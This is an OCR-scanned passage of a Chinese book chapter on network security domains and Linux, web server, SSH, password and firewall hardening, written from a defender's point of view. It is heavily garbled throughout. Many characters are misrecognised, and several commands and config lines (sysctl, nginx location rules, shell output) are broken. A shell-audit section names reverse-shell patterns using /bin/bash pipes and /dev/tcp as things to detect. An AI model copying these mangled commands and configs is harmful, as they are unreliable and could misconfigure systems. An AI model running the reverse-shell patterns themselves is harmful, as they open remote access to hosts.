内 这 组 计算 机 梭 露 的 风险 最 小 化 ， 在 发 生 攻击 或 蠕虫 病毒 等 侵害 时 能 
将 威胁 最 大 化 地 隔离 ， 减 小 域外 事件 对 域内 系统 的 影响 。 


6.1.1 ”传统 的 安全 域 划分 


图 6-1 是 一 个 典型 的 传统 中 小 型 企业 的 安全 域 划分 ， 虚 线 表 示 网 络 
边界 ， 也 正好 是 一 个 安全 域 。 通 第 会 分 出 DMZ 区 和 内 网 ， 在 传统 的 安 
全 域 划分 中 还 会 通过 便 件 防 火 墙 的 不 同 端 口 来 实现 隔离 。 但 是 如 今 这 
种 方法 越 来 越 多 地 只 适用 于 办 公 网 络 ， 对 于 大 规模 生产 网 络 ， 这 种 方 
法 可 能 不 再 适用 。 


图 6-1 传统 安全 域 示 例 


6.1.2 ”典型 的 web 服务 


典型 的 Web 服 务 通常 是 接 入 层 、 应 用 层 、 数 据 层 这 样 的 结构 ， 其 安 
全 域 和 访问 控制 遵循 通用 的 模型 ， 如 图 6-2 所 示 。 


工程 技术 人 员 可 通过 Bes 
堡 参 机 访问 应 用 层 P 
授权 的 第 三 方 可 通过 SSH 远程 
连接 访问 指定 的 数据 层 资源 两 
其 余 所 有 端口 默认 
阻 断 安全 组 防火 墙 


图 6-2 ”亚马逊 Web 服 务 的 安全 组 (ACL) 示例 


这 张 图 源 于 AWS 对 云 平 台 的 securitygroup (安全 组 ， 相 当 于 3 层 的 
防火 墙 ACL) 功能 的 举例 描述 。 其 中 Web 层 是 直接 在 互联 网 上 雄 露 给 用 
户 的 ， 而 应 用 层 不 需要 直接 上 暴露 在 互联 网 上 ， 它 只 需要 接受 Web 的 请 
求 ， 以 及 能 访问 位 于 更 靠 后 一 层 的 数据 库 层 ， 数 据 库 层 则 只 需要 接受 
来 自 应 用 层 的 请 求 ， 同 时 自己 的 MO 来 自 于 EBS 卷 ， 默 认 这 些 服务 器 都 
需要 接受 管理 员 的 SSH 连 接 ， 但 管理 员 并 非 从 互联 网 直接 发 起 连接 ， 而 
是 先 登 录 到 堡 仅 主 机 或 统一 的 运 维 跳板 机 ， 由 此 再 发 起 向 Web 层 、 应 用 
层 、 数 据 库 层 的 各 SSH 连 接 ， 如 果 是 使 用 自动 化 运 维 工具 的 场景 ， 则 3 


层 的 服务 器 要 接受 来 日 运 维 管理 平台 (例如 Puppet、SaltStack 服 务 端 ) 
的 连接 ， 这 样 每 层 只 对 外 开放 最 小 端口 ， 除 必要 的 协议 外 默认 全 部 阻 
止 访问 。 


安全 域 划分 没有 限定 为 一 是 要 划 vlan， 基 于 L3、L4 的 防火 墙 规 
则 ， 甚 至 NAI 痢 可 以 起 到 隅 离 的 作用 。 仅 仅 是 基于 L2 的 划分 比 L3 以 后 
的 更 加 可 靠 一 点 。 


6.1.3 大 型 系统 安全 域 划分 


Open Stack 有 一 个 API 流 程 图 ， 如 图 6-3 所 示 。 


大 家 觉得 图 6-3 可 以 用 来 做 OpenStack 安 全 域 划分 的 参考 吗 ? 图 示 中 
表明 了 一 些 数据 流 和 引用 关系 ， 但 最 大 的 问题 在 于 没有 标示 出 
OpenStack 各 市 点 的 安全 等 级 ， 例 如 租户 资源 池 和 管理 节点 没有 区 分 出 
来 ， 管 理 服务 中 也 有 分 类 分 级 ， 偶 后 端的 和 更 接近 租户 容 船 的 应 该 区 
分 开 来 ， 公 共 服 务 类 的 也 应 独立 标示 ， 这 样 才能 从 整体 上 区 分 不 同 的 
源 (服务 器 、 存 储 、 网 络 设备 ) 属于 什么 安全 域 。 


ER 


在 大 型 互联 网 服务 中 ， 一 般 可 以 用 图 6-4 来 抽象 表示 对 外 提供 的 服 
务 的 关系。 当然 ， 这 只 是 一 个 对 典型 服务 区 域 的 抽象 ， 真 正 的 结构 可 
能 比 图 示 要 庞大 得 多 。 
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游戏 ， 把 不 同 的 业务 (垂直 纵向 ) 以 及 分 层 的 服务 (水平 横向 ) 一 个 
个 切 开 ， 只 在 南北 同 的 API 调 用 上 保留 最 小 权限 的 访问 控制 ， 在 东西 同 
如 无 系统 调用 关系 则 彼此 隅 离 。 当 然 ， 这 个 隅 离 的 程度 在 不 同 规模 的 
网 络 里 会 不 一 样 ， 小 一 点 的 网 络 可 以 做 到 很 细 ， 但 是 大 型 网 络 如 生 做 
得 非常 细 ， 运 维 工 作 量 会 非常 大 ， 当 一 个 网 络 需 要 变更 的 时 候 访 问 控 
制 策 略 会 让 人 彻 压 葡 沫 。 所 以 具体 实践 上 是 需要 权衡 这 些 方法 的 。 相 
同 之 处 在 于 ， 不 管 网 络 规 模 大 和 小 ， 基 本 都 革 从 类 似 的 染 构 ， 区 别 只 
在 于 粒度 粗细 。 如 采 架 构 在 野蛮 成 长 的 初期 完全 没有 考虑 这 方面 的 需 
求 ， 都 是 杂乱 无 章 的， 如何 做 安全 域 划分 可 以 参考 一 下 之 前 的 妥协 折 
中 策略 。 
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图 6-3 OpenStack API 流 程 图 


如 采 希 望 尽 可 能 在 内 网 少 隔离 ， 有 利于 弹性 网 络 伸缩 ， 前 提 是 基 
于 服务 絮 的 单 点 入 侵 检 测 和 防 扩 能 力 比 较 强 。 
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图 6-4 互联 网 服务 安全 域 抽象 示例 


6.1.4 生产 网 络 和 办 公 网 络 


这 里 只 介绍 办 公 网 络 和 生产 网 络 连接 部 分 所 涉及 的 安全 域 问题 ， 
如 图 6-5 所 示 。 对 于 整个 办 公 网 络 的 安全 域 划 分 不 在 这 里 讨论 ， 以 后 在 
办 公 网 络 安全 的 章节 里 会 专门 展开 讨论 。 


之 前 提 到 渗透 生产 网 络 可 以 用 社会 工程 学 从 办 公 网 络 绕 一 图 的 方 
法 ， 加 上 互联 网 公司 的 主 营 业务 束 是 对 生产 网 络 的 频繁 发 布 和 变更 ， 
所 以 才 使 得 运 维 、 产 品 交 付 及 测试 环境 需要 “区 别 ” 对 得 。 为 保证 最 大 
的 隔离 ， 需 要 尽 可 能 地 采取 如 下 几 个 方面 的 措施 : 


:生产 网 络 的 SSH 22 闻 口 在 前 问 防火 墙 或 交换 机 上 默认 阻止 访问 。 


:远程 访问 ( 运 维 连接 ) 通过 VPN 或 专线 连接 到 机 房 生 产 网 络 。 
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.办 公 网 络 中 运 维 环境 、 发 布 源 和 其 他 OA 环境 VLAN 陋 离 。 


-虽然 在 同一 个 物理 办 公 地 点 ， 但 运 维 专线 和 办 公 网 络 的 接 入 链 路 
各 自 独立 。 


为 保证 可 用 性 ， 运 维 专线 最 好 有 两 条 以 上 且 来 目 不 同 的 ISP， 防 止 
单 链 路 故障 时 无 法 运 维 。 


:跳板 机 有 所 有 的 运 维 操作 审计 。 


有 了 这 些 隔 离 措施 之 后 ,，“ 绕 一 圈 ” 的 渗透 方法 并 非 绝 对 不 可 行 ， 
ZZ, 
27 
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图 6-5 


6.2 ”系统 安全 加 固 


系统 安全 是 所 有 安全 工作 的 第 一 步 ， 这 部 分 内 容 可 以 归 入 安全 基 
线 。 当 然 本 书 这 部 分 并 不 是 完整 的 系统 安全 加 固 方 案 ， 因 为 这 不 是 一 
本 讲 细 克 的 书 ， 仅 仅 是 拿 一 些 例子 来 说 明 ， 什 么 才 是 攻防 意义 上 的 安 
全 加 固 。 市 面 上 的 很 多 加 固 措 施 ， 有 一 半 操 作 是 “不 痛 不 痒 ”? 的 ， 既 不 
能 说 它 无 用 ， 也 没 觉 得 对 系统 安全 提升 有 多 大 帮助 。 


6.2.1 Linux 加 


关于 Linux 加 固 的 文章 ， 网 上 已 经 有 很 多 ， 所 以 只 挑 一 些 有 和 针对 性 
的 点 说 一 下 。 


1. ĦLKM 


之 前 也 提 到 过 在 一 定 程度 上 为 了 规避 类 似 于 knark、adore 这 类 的 
LKM rootkit， 把 入 侵 检 测 聚 焦 于 用 户 态 : 


也 可 以 使 用 sysctl 命 令 : 


Lroot@i-naqp5pri ~]# sysctl -w kernel .modules_disabled=1 
kernel.modules_disabled = 1 


[root@i-naqp5pri ~]# E 


无 论 是 echo 1> 赋 值 还 是 sysctl 的 方法 在 系统 reboot 后 都 会 失效 ， 所 
以 需要 加 入 启动 项 ， 编 辑 /etc/sysctl.conf 文 件 把 相关 项 写 入 。 


当然 ， 上 面 这 些 属于 治标 型 的 方法 ， 不 是 治本 型 的 ， 如 果 入 侵 者 
拿 到 root 后 ， 装 载 内 核 rootkit 重 局 一 次 系统 就 能 开局 LKM 功 能 。 治 本 的 
方法 是 在 编译 内 核 时 去 抒 LKM 文 持 ， 这 样 相 关 代 码 束 不 会 编译 进 内 


核 : 


#make config 
Loadable module support (可 加 载 模块 支持 ) 


? ( 
1) 


Enable loadable module support (CONFIG_MODULES) [Y/n/?] 选择 


n” 


或 者 : 


#make menuconfig 


结果 如 图 6-6 所 示 。 


AN (作为 超级 用 户 } 5 
APE MAE 查看 已) RRG) MT PMH 


Linux/x86_64 3.2.65 Kernel Configuration 
ys navigate the menu. <Enter> selects submenus --->. Highlighted letters are hotkeys. Pressing <Y> includes, <N> 
excludes, <M> modularizes features. Press <Esc><Esc> to exit, <?> for Help, </> for Search. Legend: [*] built-in [ 
excluded <M> module < > module capable 


i a 
General setup ---> 


ti nable loadable module support ---> 


| 

| 

| *- Enable the block layer ---> 

| Processor type and features ---> 

| Power management and ACPI options ---> 
| Bus options (PCI etc.) ---> 

| Executable file formats / Emulations ---> 
| -*- Networking support ---> 

| Device Drivers ---> 

| Firmware Drivers ---> 

| File systems ---> 

| Kernel hacking --- 

| Security options -- 

| -*- Cryptographic API --- 

} v(+) 


<Select> < Help > 


Al6-6 Linux 内核 编译 选项 


采用 治标 型 还 是 治本 型 的 方法 根据 场景 而 定 ， 如 果 确 定 基 本 不 会 
频繁 用 到 内 核 模 块 功能 ， 可 以 激进 一 点 选择 治本 型 方法 ， 如 采 某 些 机 
器 需要 经 常 变 更 驱动 ， 保 守 一 点 可 以 选择 治标 型 。 


2. 限 制 /dev/mem 


新 版 本 的 系统 默认 都 不 再 使 用 /dev/kmem 这 个 文件 ， 查 看 /boot 目 录 
下 的 config 文 件 确保 CONFIG_DEVKMEM 设 置 为 “n” 


[root@i-naqp5pri boot]# cat config- uname -r° | grep DEVKMEM 
# CONFIG_DEVKMEM 1s not set 


[root@i-naqp5pri boot]# 


CONFIG_STRICT_DEVMEM 设 置 为 "y”: 


Lroot@i-naqp5pri boot]# cat config- uname -r | grep DEVMEM 
CONFIG_STRICT_DEVMEM=y 


[root@i-naqp5pri boot]# 


如 果 只 禁用 LKM， 则 phrack 58 (http://phrack.org/issues/58/7.html 
) 中 “Linux on-the-fly kernel patching without LKM” 这 篇 文章 提 到 的 通 
过 /dev/kmem&/dev/mem 读 写 全 地 址 空间 的 方法 的 rootkit 仍 然 可 以 在 用 
户 态 实现 内 核 rootkit 的 功能 ， 典 型 的 代表 就 是 suckit， 而 在 使 用 上 述 设 
置 后 suckit 也 会 失效 。 


虽然 不 绝对 ， 但 一 般 情 况 下 可 以 无 视 内核 仿 ， 把 入 侵 检 测 聚 焦 于 
用 户 态 ， 也 就 是 前 面 提 到 的 ， 如 采 要 提高 入 侵 检 测 的 效率 ， 就 必须 只 
关注 更 少 的 点 ， 如 果 关 注 的 点 非常 多 ， 很 容易 被 信息 港 没 。 可 能 也 有 
会 问 这 样 做 是 否 有 些 过 激 ， 其 实 还 好 ， 服 务 右 环境 相 比 客户 端 环境 
还 是 有 很 大 的 不 同 ， 服 务 端 环境 相对 固化 ， 比 如 通常 不 需要 开发 工 
具 ， 经 间 变 更 部 分 主要 集中 在 服务 天 软 件 的 配置 和 应 用 的 代码 数据 ， 
其 余 的 要 更 比较 少 。 而 入 侵 过 程 则 相反 ， 可 能 会 动 到 一 些 运 维 不 经 时 
变更 甚至 不 应 该 变更 的 部 分 。 


3. 内 核 参数 调整 


源 于 shawn 的 一 篇 加 固 文 档 (http://drops.wooyun.org/tips/2621 ) A 
统 的 ASLR， 地 址 空间 随机 映射 (一 种 缓冲 区 淤 出 缓解 机 制 ， ， 局 动 设 
置 为 2: 


kernel. randomize_va_space=2 


/proc/sys/kernel/randomize_va_spaceH{H 4H F: 
0 关闭 ASLR 


1 mmap base ` stack ` vdso page 将 随机 化 。 这 意味 着 .so 文件 将 被 
加 载 到 随机 地 址 。 链 接 时 指定 了 -pie 选 项 的 可 执行 程序 ， 其 代码 段 加 载 
地 址 将 被 随机 化 。 配 置 内 核 时 如 果 指 定 了 CONFIG_COMPAT _BRK， 
randomize_va_space 默 认为 1°。 此 时 heap 没 有 随机 化 。 


2 在 1 的 基础 上 增加 了 heap 随 机 化 。 配 置 内 核 时 如 果 禁 
CONFIG_COMPAT_BRK，randomize_va_space 默 认为 2。 


隐藏 内 核 符 号 表 ， 局 动 设置 为 1: 


kernel.kptr_restrict=1 
/proc/sys/kernel/kptr_restrict 


A RR HEE, JEN 65536: 


vm/mmap_min_addr=65536 
/proc/sys/vm/mmap_min_addr 


10 年 前 我 写 Linux 系 统 加 固 文章 时 也 提 到 了 PaX 和 Grsecurity， 安 全 
感 这 个 东西 是 没有 止境 的 ， 实 际 上 目前 除了 Docker 的 公有 云 多 租户 环 
境 (私有 云 不 需要 ) ， 一般 情况 下 也 不 会 选择 这 么 激进 。 更 多 的 还 是 


希望 某 些 Linux 的 发 行 版 本 中 以 默认 配置 集成 各 种 攻击 缓解 机 制 。 退 一 
步 则 希望 即便 默认 不 开局 ， 但 以 内 核 参 数 等 形式 提供 更 高 保护 级 别 的 
选择 权 。Windows 新 版 本 提供 的 这 方面 的 保护 也 越 来 越 强 ，Linux 应 该 
也 会 有 这 种 趋势 。 


4. 禁 用 NAT 


攻击 者 在 渗透 内 网 时 经 和 常 用 到 的 一 个 技巧 就 是 在 边界 开启 端口 转 
发 ， 这 样 能 提供 一 个 方便 的 途径 访问 内 网 服务 器 ， 所 以 防御 者 要 做 的 
就 是 禁用 IP 转 发 : 


# echo 0 > /proc/sys/net/ipv4/ip_forward 


当 这 个 值 无 缘 无 故 变更 为 1 时 ， 说 明 很 可 能 是 出 了 安全 问题 。 


但 有 些 服务 可 能 会 用 到 ， 比 如 需要 网 关 路 由 功能 的 ， 例 如 LVS 提 供 
负载 均衡 ，Docker 也 需要 。 


5.Bash 日 志 


系统 默认 有 一 个 日 志文 件 .bash_history 在 用 户 目 录 下 : 


root@-naqp5pri ~]# cd ~;|s -al .bash_history 
oot root 7387 Aug 20 20:51 .bash_history 


ri ~]# 国 


打开 ~/.bashrc 文 件 添 加 以 下 配置 。 


设置 环境 变量 为 只 读 : 


readonly HISTFILE 
readonly HISTFILESIZE 
readonly HISTSIZE 
readonly HISTCMD 
readonly HISTCONTROL 
readonly HISTIGNORE 


Ahistory3C (EPS HUAY lil EX: 


# export HISTTIMEFORMAT='%F %T ' 


root@debian:~# export HISTTIMEFORMAT='%F %T' 
root@debian:~# history 5 
250 2015-08-09 21:49:19less .bashrc 
251 2015-08-09 22:17:32export HISTTIMEFORMAT='%F%T' 
252 2015-08-09 22:17:42history 10 


fi ZEB: 
source ~/.bashrc` 
设置 history 文 件 只 能 追加 : 
# chattr +a ~/.bash_history 
对 所 有 可 登录 用 户 的 shell history 全 都 添加 以 上 属性 。 
Sn A HAE shell: 
‘/bin/ksh (Kornshell 由 AT&T 贝 尔 实验 室 发 展 出 来 的 ， 兼 容 bash) 


/bin/tcsh (整合 C Shell， 提 供 更 多 的 功能 ) 


.bin/csh (已 经 被 /bin/tcsh 所 取代 ) 


/bin/zsh (基于 ksh 发 展 出 来 的 ， 功 能 更 强大 的 shell) 


更 改 HISTFILE 为 其 他 文件 : 


HISTFILE=/usr/local/log/cmd 


并 保留 原 路 径 下 的 .bash_history 文 件 。 


上 面 这 些 配 置 其 实 都 只 是 一 些小 技巧 ， 本 意 是 和 硕 望 应 急 啊 应 时 有 
命令 行 记录 ， 能 够 尽 可 能 “省 事 ”。 很 多 加 固 项 其 实 都 能 绕 过 ， 但 这 个 
比较 低 的 防御 门槛 还 是 会 起 些 作用 : 


.对 Linux 系 统 不 够 熟悉 的 入 侵 者 。 


不够 "机智 " 的 目 动 化 日 志清 理工 具 。 


-自动 化 攻击 的 bot 程 序 。 

对 于 高 手 的 入 侵 者 而 言 ， 这 些 措施 可 能 束 不 太 管用 了 ， 前 面 提 到 
过 在 安全 防御 的 中 高 阶 一 段 ， 会 逐步 开始 自己 发 明 轮 子 ， 不 完全 依赖 
于 系统 提供 的 既 有 机 制 。 


6. 高 级 技巧 


和 争取“ 一劳永逸 ?地 解决 shell 历 史记 录 的 问题 。 为 什么 如 此 偏爱 命令 
TIVE? 因为 再 优秀 的 入 侵 者 也 要 用 shell， 另 一 方面 对 于 安全 工作 
者 而 言 ， 由 shell 命 令 行 记 录 做 入 侵 分 析 会 简单 很 多 。 高 阶 的 方法 就 是 
修改 shell 本 身 ， 不 依赖 于 内 置 的 HISTFILE， 而 是 对 所 有 执行 过 的 命令 
无 差别 的 记录 。 


修改 shel 源 代码 是 一 种 方式 ， 不 过 相 比 之 下 ， 直 接 修改 libc 可 能 
更 加 高 效 。 主 要 涉及 的 对 象 就 是 exec 落 数 族 : 


#include <unistd.h> 

extern char **environ; 

int execl(const char *path, const char *arg, ...); 

int execlp(const char *file, const char *arg, ...); 

int execle(const char *path, const char *arg, ..., char * const envp[]); 
int execv(const char *path, char *const argv[]); 

int execvp(const char *file, char *const argv[]); 

int execve(const char *path, char *const argv[], char *const envp[]); 


修改 以 上 库 函 数 ， 支 持 额 外 的 syslog， 这 样 能 记录 所 有 运行 过 的 程 
序 。 实 际 上 ， 男 外 5 个 函数 都 是 调用 的 execve () 。 


一 种 shell 审 计 的 高 级 方式 是 将 shell 的 log 统 一 收集 后 基于 机 器 学 
习 ， 以 算法 学 习 正 常 管理 员 的 shell 命 令 习 惯 ， 而 不 是 以 静态 规则 定义 
黑 日 名 单 。 比 如 公司 的 运 维 人 员 习 惯用 “ls-al”* 而 不 是 用 “ls-la” 或 
者 1”"， 还 有 比如 正常 的 管理 员 可 能 不 太 会 去 前 击 一 些 冷 门 的 命令 ， 
如 “whoami”， 更 不 可 能 
用 “xxxxxx|/bin/bashlxxxxxx” 或 “Xxxxxx/dev/tcpxxxxx” 这 种 反弹 shell 的 命 


A 


“用 户 行为 监控 : bash history logging W 
Ri *http://os.51cto.com/art/201102/244661.htm 


6.2.2 ”应 用 配置 加 固 


1. 目 隶 权限 


有 人 句 话 在 安全 圈 流 传 : “可 写 目 录 不 解析 ， 解 析 目 录 不 可 写 ”， 这 
句 话 主要 用 于 对 抗 webshell， 寅 意 为 攻击 者 通过 文件 上 传 漏洞 ， 上 传 
webshell 或 通过 应 用 层 漏洞 (例如 SQL 注 入 ) 在 可 写 目 录 下 写 入 一 个 
webshell 功 能 的 脚本 后 ， 因 为 没有 执行 权限 ， 无 法 通过 webshell 执 行 命 
令 ， 或 者 当 目 录 有 解析 执行 权限 的 时 候 ， 因 为 没有 写 权 限 ， 无 法 在 目 
录 下 生成 webshell 的 文件 也 不 能 同 已 有 的 业务 代码 中 写 入 webshell 而 达 
不 到 渗透 的 目的 。 这 个 规则 实际 上 源 于 新 型 编程 语言 诞生 之 前 的 时 
代 ， 在 诸如 node.js 等 新 兴 语 言 发 展 的 上 时候， 这 些 规则 可 能 适用 面 会 越 来 
越 小 。 


解析 目录 不 可 写 ， 以 root 用 户 为 例 : 


#chmod 755 /web/root 


如 果 业 务 需 求 部 分 子 目 录 要 改 为 777 权 限 ， 则 更 改 目 录 属 主 为 Web 
进程 用 户 : 


#chown nginx: /web/root/childdir 


可 写 目 录 不 解析 。 对 于 PHP， 在 Nginx 配 置 文件 中 添加 如 下 配置 ， 
即 可 禁止 log 目 永 执行 php 脚 本 : 


location ~* 4/data/cgisvr/log/.*\.(php|php5)$ { 
deny all; 
} 


对 于 Java，Tomcat 默 认 解 析 jspx 文 件 格式 后 级 ， 若 不 需要 使 用 jspx 
文件 ， 则 删除 对 jspx 的 解析 ， 有 具体 操作 为 修改 conffweb.xml 文 件 : 将 如 
PB RATE RET 。 


<url-pattern>*.jspx</url-pattern> 


2.Web 进 程 以 非 root 运 行 


Web 进 程 以 非 root 权 限 运 行 遵循 了 最 小 权限 原则 ， 假 如 以 root 权 限 
运行 则 市 来 两 方面 的 问题 : 


如 采 守 护 进程 存在 远程 涤 出 类 漏洞 ， 则 通过 exploit 攻 击 后 远程 基 


Æ EMBE E: rootshell“#”。 


-如 有 果 应 用 层 代 码 出 现 漏洞 ， 所 有 的 脚本 (也 包括 上 传 的 webshell) 
将 直接 以 root 权 限 执行 系统 命令 ， 整 个 入 侵 过 程 无 须 提 权 就 可 以 一 步 到 
位 ， 入 侵 的 途径 平坦 了 很 多 : 


oot@i-nagpSpri nginx]# ps -ef | grep nginx 
t 220 1 0 May20 ? 00:00:00 nginx: master 
3221 3220 0 May20 ? 
11 


m 
? 00:02:11 nginx: worker pro 
11814 11446 0 :59 pts/1 00:00:00 grep --color=auto nginx 
5 xj# E 


root 
root@i-naqp5pri ngin 


Nginx 的 master 进 程 默认 以 root 权 限 运 行 ， 而 处 理 用 户 数据 的 worker 
进程 默认 以 Nginx (nobody) 权限 运行 。 


3. 过 滤 特 定 文件 类 型 


一 些 文件 对 于 正 滑 用 户 访问 并 不 需要 ， 但 是 扫描 器 喜欢 ， 渗 透 者 
也 喜欢 人 肉 猜测 ， 例 如 管理 员 不 小 心 在 Web 目 孙 下 留 了 一 个 备份 文件 ， 
里 包含 了 一 个 重要 的 key， 通 过 这 个 key 得 到 了 应 用 后 人 台 管 理 员 的 权 
限 ， 攻 击 者 就 达到 了 目的 。 诸 如 .bak、.log、.zip、.sql 这 些 都 是 正常 访 
问 的 用 户 不 需要 的 ， 一 般 用 户 体验 做 得 比较 好 的 网 站 会 把 HTTP 404 重 
定向 到 公益 或 广告 类 的 友好 界面 ， 对 于 安全 来 说 ， 则 需要 通过 rewrite 规 
则 把 攻击 特征 的 URL 重 定 同 到 我 们 目 己 的 页 面 ， 而 避免 让 攻击 者 下 载 
到 不 该 下 载 的 文件 ， 如 下 所 示 : 


Listen 88; 

server_name 10.13.8.90; 

root /data/softs/dev_tools; 

index admin.html index.htm index.html; 
autoindex on; 

charset utf-8; 

#charset gbk; 


location / { 


} 


location ~* \.(log|cLlass|inc|bak)$ 
rewrite ^ http://www.xsec.io/ permanent; 


在 这 个 配置 中 : 


location ~* \.(log|class|inc|bak)$ { 
rewrite ^ http://www.xsec.io/ permanent; 


把 .log.class.inc.bak 类 型 的 文件 做 了 重 定 同 。 当 然 ， 有 些 例如 .inc 不 
能 完全 过 滤 ， 这 些 都 需要 与 运 维 以 及 开发 讨论 一 下 


Modrewrite 还 可 以 做 很 多 事情 ， 比 如 根据 客户 端 cookie 做 人 机 识 
别 ， 但 是 毕竟 还 是 有 WAF 这 个 东西 在 ， 所 以 就 不 打算 让 它 承 担 太 多 职 


6.2.3 ”远程 访问 


SSH 是 目前 最 常见 的 远程 访问 之 一 ， 在 生产 网 络 中 占 比率 最 高 ， 一 
般 来 说 需要 儿 点 ， 其 余 加 固 项 可 通过 搜索 引擎 参考 网 上 的 文章 。 


使 用 SSH V2， 而 不 是 V1: 
Protocol 2 

禁止 root 远 程 登录 : 
PermitRootLogin no 


6.2.4 ”账号 密码 


账号 密码 的 涉及 玫 围 非常 三 ， 包 括 OS、 数 据 库 、 中 间 件 / 容 右 、 所 


有 的 应 用 管理 后 台 、 网 络 设备 、 安 全 设备 、 目 动 化 运 维 管理 后 台 、 
VPN 账 号 等 ， 之 所 以 在 系统 加 固 之 外 单列 出 来 是 因为 密码 又 破 已 成 为 


当下 比较 主要 的 渗透 方式 之 一 ， 从 来 部 没有 哪个 时 代 像 当前 这 样 热 囊 
于 猜 解 密码 。 


对 付 暴 力 破解 最 有 效 的 方式 是 多 因素 认证 或 非 密码 认证 ， 考 虑 到 
可 用 性 的 问题 ， 不 太 可 能 开局 账户 登录 失败 锁定 策略 ， 那 样 的 话 整 随 
着 互联 网 上 的 又 破 直接 变 成 拒绝 服务 了 ， 所 以 在 无 法 使 用 MFA (多 因 
素 认 证 ) 或 证 书 认 证 的 场合 ， 最 低 的 底线 的 还 是 设置 复 洒 的 密码 ， 但 
征 什 么 才 算 复杂 的 密码 呢 ? 这 个 定义 可 能 跟 过 去 完全 不 同 。 过 去 满足 


一 定 长 度 和 复杂 度 的 就 算是 可 以 ， 而 如 今 攻击 者 早已 站 在 大 数据 的 维 
度 ， 即 攻击 者 手 上 拥有 各 种 社工 库 ， 拥 有 几 十 亿 网 名 的 常用 密码 ， 尽 
管 你 可 以 设置 一 个 看 上 去 有 一 定 复杂 度 的 密码 ， 但 只 要 这 个 密码 在 黑 
客 的 “字典 ?里 ， 在 攻击 者 的 数据 库 中 ， 那 实质 上 还 是 一 个 “ 弱 ” 密 码 。 有 
些 入 侵 事 件 的 根 因 分 析 ， 因 为 觉得 日 己 管 理 员 密 码 比 较 长 所 以 束 主 观 
排除 了 通过 口令 入 侵 的 可 能 ， 但 十 在 其 他 点 上 又 找 不 到 原因 ， 然 后 顺 
厦 APT 的 方 和 去 了 ， 再 然后 束 没 有 然后 了 .…… 其 实 没 想到 束 是 “ 弱 ” 密 码 
导致 的 。 


站 在 攻击 者 的 角度 ， 目 己 主 动 破解 密码 在 当下 的 互联 网 行业 已 经 
算 不 上 是 什么 激进 的 手段 了 。 作 为 甲 方 安全 团队 ， 平 时 也 应 该 收集 各 
种 社工 库 ， 把 公司 内 部 研发 测试 运 维 常用 的 * 弱 ”密码 做 成 字典 ， 周 期 
性 地 更 新 这 个 字典 并 主动 尝试 破解 公司 内 各 个 系统 的 账号 ， 能 破解 的 
都 视 为 弱 密 码 ， 即 可 要 求 相 关 人 员 人 整改 。 越 往 后 ， 一 厅 情 愿 地 站 在 防 
御 者 角度 做 安全 会 越 来 越 难 做 ， 防 御 者 必须 跟随 攻击 者 的 脚步 ， 避 免 
被 “领先 一 个 时 代 ”。 


6.2.5 网 络 访问 控制 


安全 域 和 访问 控制 的 区 别 在 于 ， 安 全 域 是 更 加 高 层次 的 圈 地 运 
动 ， 而 NACL 相 对 更 具体 化 ， 针 对 的 是 每 一 个 系统 ， 安 全 域 相对 固化 ， 
基本 不 会 变动 ， 而 NACL 则 会 应 需 而 变 。 


有 人 说 防火 墙 这 种 东西 会 淘汰 ， 我 觉得 这 种 观点 跟 “ 计 算 机 终究 会 
消亡 ”是 一 样 的 ， 没 什么 意义 。 防 火 墙 在 安全 管理 的 技术 手段 里 占 的 整 
体 比 重 是 越 来 越 小 ， 但 不 代表 它 没有 价值 或 彻 确 淘 状 ， 实 际 上 防火 场 
在 NACL 领域 里 扮演 着 无 可 替代 的 作用 。 


在 大 型 互联 网 里 ， 购 天 商业 防火 墙 产品 可 能 会 越 来 越 少 ， 大 部 分 
都 会 转 为 使 用 Netfilter+ 高 性 能 PC 服务 器 。 当 然 ， 也 有 用 得 到 商业 产品 
的 时 候 ， 例 如 在 DC 的 出 口 可 能 会 部 署 高 性 能 的 硬件 防火 墙 ， 这 个 防火 
省 实际 并 不 充当 传统 意义 上 访问 控制 网 关 的 作用 。 而 是 很 多 时 候 需 要 
在 总 出 口 部 署 几 条 类 似 于 “ 黑 名 单 ” 的 总 体 策略 \ 儿 条 策略 几 十 万 元 ， 
一 条 策略 十 万 元 是 不 是 有 点 小 奢侈 ) ， 例 如 公有 云 环境 ， 租 户 的 业务 
需要 开放 哪些 端口 是 不 确定 的 ， 不 能 替 他 做 主 一 刀 切 ， 这 个 策略 有 可 
能 是 临时 的 ， 也 可 能 是 持久 的 ， 但 在 核心 交换 机 上 做 太 多 NACL 不 合 
适 ， 于 是 把 NACL 还 古 单 拆 出 来 ， 串 联 一 个 硬件 防火 墙 ， 在 防火 墙 上 做 
具体 的 NACL。 如 采 防 淡 增 后 的 业务 是 确 定 开放 某 几 个 端口 ， 则 防火 场 
可 以 过 滤 所 有 的 不 必要 端口 充当 起 访问 控制 网 关 的 作用 。 


除了 网 天 级 的 访问 控制 以 外 ， 还 有 机 想 级 的 NACL 和 系统 级 的 
NACL， 机 柜 的 上 联 交 换 机 可 以 做 一 些 简 单 的 NACL， 其 细 粒 度 以 不 影 
响 正 常 的 运 维 便利 为 准 。 


系统 级 的 NACL 用 OS 目 市 的 防火 墙 惑 完全 够 用 了 ， 只 开放 服务 端 
口 和 管理 端口 ， 个 别 高 等 级 安全 域 的 机 器 可 以 对 源 进 行 更 细 粒 度 的 限 
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生产 网 络 多 层 NACL 架 构 如 图 6-7 所 示 ， 采 用 多 层 NACL 的 原因 在 
于 ， 一 方面 安全 域 之 间 需 要 隔离 ， 安 全 域内 部 也 需要 划分 ， 另 一 方面 
当 某 一 层 的 NACL 失 歼 时 ， 还 有 其 他 层 的 NACL 在 抵挡 ， 不 会 马上 变 
成 “裸奔 ”模式 。 实 际 上 ， 某 一 NACL 失 效 可 能 是 一 件 很 容易 碰 到 的 事 
情 ， 因 为 某 些 网 络 变更 ， 或 者 因为 调试 ， 人 为 地 申请 了 临时 策略 ， 或 
临时 取消 防火 墙 策略 ， 完 事后 又 忘 了 “ 回 深 ”， 甚 至 连 审批 策略 的 人 自 
己 都 忘 了 这 事 了 。 不 太 严 重 的 情况 下 ， 由 于 骏 露 了 攻击 面 ， 入 侵 检 测 
的 告警 数量 会 因 网 络 蠕虫 和 自动 化 攻击 工具 的 行为 急剧 增多 ， 严 重 一 
点 ， 被 盯梢 的 情况 下 ， 可 能 就 被 渗透 了 。 


/ FASE NACL: FW 


了 /第 2 层 NACL: 交换 机 


/第 3 层 NACL: 服务 器 


Al6-7 生产 网 络 多 层 NACL 架 构 


在 海量 IDC 退 求 弹 性 运 维 的 架构 中 ， 可 能 NACL 无 法 实施 到 理想 状 
态 ， 这 就 有 要求 在 两 个 方面 做 补偿 : 


